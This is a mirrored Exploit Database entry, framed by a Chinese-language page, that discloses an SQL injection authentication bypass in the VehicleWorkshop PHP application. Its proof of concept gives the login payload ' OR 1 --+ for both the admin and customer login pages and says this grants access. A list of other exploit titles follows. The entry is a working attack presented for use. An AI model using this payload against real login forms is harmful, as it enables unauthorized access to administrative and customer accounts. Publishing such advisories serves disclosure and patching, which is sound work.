VehicleWorkshop – Authentication Bypass

Exploit Database
19 阅读

作者： Touhid M.Shaikh

日期： 2017-08-01
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/42403/

[*] Type: Admin or Customer login bypass via SQL injection
[*] Author: Touhid M.Shaikh
[*] Vendor Homepage: https://github.com/spiritson/VehicleWorkshop
[*] Mail: touhidshaikh22[at]gmail[dot]com
[*] More info: https://blog.touhidshaikh.com/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


===================== PoC ================

Admin Login Page : http://127.0.0.1/emplogin.php
Customer Login Page : http://127.0.0.1/login.php


Navigate admin login page or Customer Login Page and submit ' OR 1 --+ for
username and password




and it should give you access to the admin area or Customer Area.


Regards.
Touhid Shaikh

last Exploits
VehicleWorkshop – Authentication Bypass的更多信息

EasyITSP – ‘voicemail.php’ Directory Traversal：
4Images 1.7.9 – Multiple Vulnerabilities：
YouPHPTube<= 7.8 - Multiple Vulnerabilities：
Olive File Manager 1.0.1 iOS – Multiple Vulnerabilities：
Advanced Electron Forum 1.0.9 – Persistent Cross-Site Scripting：
WordPress Plugin AllWebMenus 1.1.3 – Remote File Inclusion：
Optergy 2.3.0a – Remote Code Execution：
Yandex.Server 2010 9.0 – ‘text’ Cross-Site Scripting：